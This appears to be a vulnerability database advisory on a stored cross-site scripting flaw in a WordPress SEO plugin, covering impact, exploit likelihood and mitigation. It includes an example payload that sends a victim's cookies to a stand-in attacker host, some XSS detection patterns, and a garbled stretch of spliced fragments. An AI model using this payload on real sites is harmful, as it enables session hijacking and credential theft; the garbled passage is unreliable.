
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-58019 is a Stored Cross-Site Scripting (XSS) vulnerability in the Search Atlas SEO plugin (also known as metasync) for WordPress. It affects all versions of the plugin up to and including 2.5.4. The vulnerability was published on September 22, 2025, and carries a CVSS v3.1 base score of 6.5 (Medium) (Feedly).
The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically as a Stored XSS variant. An authenticated attacker with low-level privileges can inject malicious scripts into fields processed by the plugin, which are then persistently stored and later rendered in the browsers of other users (including administrators) who view the affected content. The changed scope in the CVSS vector indicates that the impact extends beyond the vulnerable component itself, potentially affecting the broader WordPress environment (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, including site administrators. This can lead to session hijacking, credential theft, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and defacement of the WordPress site. The confidentiality, integrity, and availability of the affected site are all at low-to-moderate risk, with the potential for privilege escalation if an administrator's session is compromised (Feedly).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-58019 at this time. The EPSS score is approximately 0.034%, indicating a low probability of exploitation in the near term. Exploitation requires an authenticated attacker with at least low-level privileges (e.g., a Contributor or Author role) and user interaction from a victim (such as an administrator viewing the injected content). The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable input field.%3Cscript%3E, javascript:, onerror=).wp_options, wp_postmeta) associated with the Search Atlas SEO plugin.Users should update the Search Atlas SEO (metasync) plugin to a version beyond 2.5.4 that includes a fix for this vulnerability. Until a patched version is available or applied, administrators should restrict plugin access to trusted users only and limit the Contributor/Author roles on the site. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense. Regularly auditing stored content and plugin settings for unexpected script tags is also recommended (Feedly, Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."